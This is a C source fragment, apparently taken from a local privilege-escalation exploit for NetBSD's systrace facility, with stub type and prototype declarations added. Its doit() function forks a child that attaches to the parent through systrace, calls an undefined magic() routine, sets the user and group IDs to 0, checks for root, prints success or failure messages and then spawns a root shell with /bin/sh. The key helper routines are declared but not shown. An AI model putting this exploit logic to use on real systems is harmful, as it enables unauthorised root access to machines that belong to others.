
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int execlp (char*,char*,int ) ;
 int exit (int) ;
 int fork () ;
 scalar_t__ getuid () ;
 int kill (int,int) ;
 int magic () ;
 int nbsd_attach_parent (int) ;
 int nbsd_handle_msg (int) ;
 int nbsd_systrace_open () ;
 int printf (char*) ;
 int setgid (int ) ;
 int setuid (int ) ;
 int sleep (int) ;
 int system (char*) ;

void doit()
{
        int p,f,fd;

        fd = nbsd_systrace_open();

        f = fork();

        if (f == 0) {
                sleep(1);
                nbsd_attach_parent(fd);
                while (1) {
                        nbsd_handle_msg(fd);
                }
                exit(1);
        }
        printf("[+] Doing some magic... ");
        sleep(2);
        magic();

        setuid(0);
        setgid(0);

        kill(f, 9);

        if (getuid() != 0) {
                printf("failed.\n");
                printf("\nSorry but the exploit failed.");
                exit(1);
        }

        printf("done.\n\n");

        system("uname -v");
        system("id");
        execlp("/bin/sh", "/bin/sh", 0);
}
